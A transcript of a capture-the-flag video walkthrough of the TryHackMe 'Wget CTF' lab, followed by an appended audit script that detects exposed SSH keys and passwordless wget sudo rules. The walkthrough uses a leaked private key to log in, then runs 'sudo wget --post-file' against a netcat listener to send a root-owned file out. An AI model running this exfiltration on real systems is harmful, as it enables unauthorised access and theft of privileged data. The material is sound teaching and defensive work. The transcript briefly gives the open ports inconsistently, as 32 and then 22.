Beginner and Easy CTF | TryHackme Wget CTF

Captions
What's going on, YouTube? Welcome back. In today's video we're going to do another popular and easy machine on TryHackMe. The machine name is Wget CTF and the objective on this machine is to exfiltrate the root flag, so we're not required to gain a root shell, rather to gain the actual flag from the machine. I haven't prepared anything on the board we usually write on in every video, since the machine is easy and is aimed at those who are getting started. As you can see, we have two flags required, so let's get started.

I have done the nmap scan and, as you can see here, we have two open ports, 32 and 80. Take a look at the flags I have used: this is actually a noisy scan, it's not recommended if you are scanning a target behind a firewall; this one is for enumerating the services and the corresponding versions, and this one is for accuracy of the scan. So as you can see we have two open ports, 22 and 80.

Right off the bat we start the browser and navigate to port 80 so we see what the page looks like, since we don't have any credentials. Always, when you don't have credentials, you cannot just go ahead and start with brute force too. In some cases you may just look if the OpenSSH version here, 7.2, has an exploit; if it has an exploit, go the quickest path. But normally we start first with port 80. So we navigate now to the page, and this is the Apache default page. When you actually install Apache this is the first page, the default page you get when you first navigate to the IP address or the address of the server. Since there's nothing on here, we're gonna start gobuster, enumerating directories and files on the target server. We type in the IP, and now comes the choice of the wordlist: /usr/share/dirb/wordlists, let's choose common.txt, and there you go. Gobuster is actually trying to find directories and files on the server that give a 200 response from the server, where the actual files and directories exist, so we can navigate and explore them. As you can see we have index.html with a 200 response code; the others have 403. We're interested in these: we have server-status, we have sitemap, which is interesting because it gives a 301 redirect; 301 means redirect to another page.

So let's go to sitemap and explore the page. When you open sitemap we get this page: "take on your biggest projects and goals with unapp's high quality features". So this is an app page, but it's an empty one I guess, as you can see, or it's not loading correctly; let me refresh the page. An app template, okay. If you take a look now at the page source, let's see here. Normally in CTFs the page source contains useful information for your progress, so we're looking here for useful comments, hidden fields. Nothing in here. We didn't do that for the default Apache page; normally you won't find much useful data in this page, but let's take a look at the page source, maybe there is something in here. Scroll down. Okay, take a look at this: "jesse don't forget to update the site". Take a look at the grammar here; there is a problem in the grammar, which means maybe the developer or someone else has actually typed in the comment, right? Normally in the Apache default page there is no such comment in the default installation, just "don't forget to update the site", so this actually has been written on purpose, which means this jesse is actually a potential username. So we keep jesse in mind and we get back here.

Okay, here there is nothing in the sitemap page source, so let's run a further scan on the sitemap. We're going to use gobuster one more time and this time we will type here sitemap, to see if there are subdirectories under sitemap we don't know about. And indeed, guys, as you can see, we have one: /.ssh. If you know what I mean, there might be a private key here under this directory. Let's navigate to that .ssh; it's very weird to find this. Indeed, we have id_rsa and when you click on that you get a private key. Now, coupled with the fact that we have stumbled upon a username in the HTML page source, we're gonna attempt to log in to the SSH server with this information.

ls, let's see what we have in here. I have many messy things here so I'm gonna ignore all of that. I'm gonna create a private key: nano id_rsa, okay, save that, and we're going to adjust the permissions of that private key id_rsa. Okay, now we're going to attempt to log into the SSH server: sudo ssh -i id_rsa, the username we have found, and the address. Let's see here, and yes, we are logged in.

So what are the takeaways until now? There are no actual takeaways from this machine up until this point; as you can see we haven't done anything, right? We just did an nmap scan, we then did a directory search on the web server, we found a couple of directories and there are leaked SSH credentials. That's it. Enumeration is key all the time.

Okay, so now we've got access to the SSH server, let's grab the user flag. pwd, where am I? I am under jesse. ls, cd Desktop. id, uname -a: Linux corp1, okay. So let's issue find -type f -name and we're looking for the name of the file, user flag. So what could be the file name? user, like that. Nothing in here, so there is no file called user.something. Let's try .txt. Okay, I guess we have forgotten to define where we want to look for this file, so under the root file system or in all the file system, let's search if there is any file like that. We use the star here, guys; the star here is actually kind of a regular expression to tell the find command that we're looking for a file whose name starts with user and ends with anything else after the r. Let's see here. Okay, so we modify the command and we put it here. Here it is: /home/jesse/Documents/user_flag. So cat, and this is the user flag.

Okay, now the root flag. For the root flag we need to be root, right? So sudo -l: we can issue /usr/bin/wget as root without the need to supply a password. So what does that mean? It means we can download the root flag, guys, using wget. So how to do that? We're gonna start the listener on my machine: nc -lvp 4545. Okay, and we can issue a command here: sudo /usr/bin/wget. As you know, wget is used to download files, right, and wget is also used to post files to a listener, so if you have got a listener here we can actually use wget to post files to the listener, using the following command. With --post-file we define first what is the file we would like to post, equals... we suspect that the root flag actually is located under the usual directory, /root/flag, right? So /root/ what? We don't know the name yet, so we have to find the name. Let's go back and issue the find command; we're looking here for something like root and we put a star here to tell find that we would like to find all the files whose name starts with root and it doesn't matter what comes after the t. Let's see here. We're going to find out the file name of the root flag: root_maxkeys, root_maxbytes. I'm guessing that we will not be able to find the name, since the file is under /root and we don't have permission to access that directory. In this case we're gonna just attempt to do something like that. So the post file here, we're going back to the wget command. Where is the command? Okay, I have to type this from scratch: sudo -l, okay, sudo /usr/bin/wget, and then http://, we need my IP address and the port I'm using as a listener, 4545. So /root/root flag: "missing, no such file or directory". So it means root flag is not the correct file name.

Okay, then let's go back and try to find it. Let's remove this one. All right, I have an idea: we can look under the root file system, right? Nothing. Okay, let's look for all text files maybe, so .txt, like that; it's definitely a text file, right? So let's look for all text files under the root file system. Nothing. Okay, let's cancel the root, show me all the text files. So we have got the user flag; I am sure we will be able to find the name of this file. Okay, so no hints about the file name, and it's actually clear that we cannot access the /root directory to enumerate or to find out what the file names are in there. Let me get back, see if there is something about this file, root flag. Okay, we need the filename, guys, so we have to rely on guessing here. So instead of root flag here as a file name, let's try with root.txt: missing file, okay, not the correct file name. So root.txt is not the file name, root flag is not the correct file name. Let's try with flag alone: again not the correct file name. So what could be the file name of the root flag? Let's try root_flag. Ah, this time it worked. Okay, so this is the root flag. So what worked, actually? The actual file name is root_flag, right? We tried combinations of flag alone, root individually, root flag didn't work; the one that worked is root_flag. So this is the flag, we're gonna now paste this and end this challenge. That was today's challenge, guys, I hope you liked the video and see you later.
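The walkthrough above succeeds because of two misconfigurations: an SSH private key served from the web root (/sitemap/.ssh/id_rsa) and a sudoers rule that lets a user run wget as root without a password, which turns wget's --post-file into an arbitrary file read. The following audit script is an added example (not from the video or from TryHackMe); the sudoers excerpt it checks is constructed for the demonstration, and the default web root /var/www/html is an assumption.

```shell
#!/usr/bin/env bash
# Added audit script for the two weaknesses shown in the Wget CTF walkthrough:
#   1. an SSH private key reachable under the web root (the /sitemap/.ssh/id_rsa find)
#   2. a sudoers rule granting NOPASSWD wget as root, which lets that user read any
#      root-owned file by posting it with --post-file (or overwrite files with -O).

# List files under the given web root whose content is a PEM/OpenSSH private key.
find_exposed_keys() {
    local webroot="$1"
    grep -rlE -e '^-----BEGIN (OPENSSH|RSA|EC|DSA) PRIVATE KEY-----' "$webroot" 2>/dev/null
    return 0   # "no findings" is not an error for the caller
}

# Read sudoers text on stdin and print only the rules that grant NOPASSWD wget.
# Comment and Defaults lines are dropped first so a commented-out rule cannot match.
flag_nopasswd_wget() {
    grep -vE '^[[:space:]]*(#|Defaults)' \
        | grep -E 'NOPASSWD' \
        | grep -E '(^|[[:space:]/])wget([[:space:],]|$)'
    return 0
}

# Constructed sudoers excerpt modelled on the machine's "sudo -l" output (not real config).
SAMPLE_SUDOERS='Defaults env_reset
root    ALL=(ALL:ALL) ALL
jesse   ALL=(root) NOPASSWD: /usr/bin/wget
alice   ALL=(ALL) NOPASSWD: /usr/bin/systemctl status apache2
# bob   ALL=(ALL) NOPASSWD: /usr/bin/wget   (commented out, must not be reported)'

main() {
    local webroot="${1:-/var/www/html}"   # assumed default Apache web root
    echo "[*] private keys served from $webroot:"
    find_exposed_keys "$webroot"
    echo "[*] NOPASSWD wget grants in the sample sudoers:"
    printf '%s\n' "$SAMPLE_SUDOERS" | flag_nopasswd_wget
    echo "[*] on a live host: sudo cat /etc/sudoers /etc/sudoers.d/* | flag_nopasswd_wget"
}

main "$@"
```

Any hit from the second check should be replaced with a rule limited to the exact wget invocation that is needed, or removed; a hit from the first means the key must be rotated, not just deleted from the web root.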
Info
Channel: Motasem Hamdan
Views: 4,449
Keywords: CTF, Wget, linux, SSH
Id: 0lcxs0sn70o
Length: 16min 22sec (982 seconds)
Published: Tue Mar 29 2022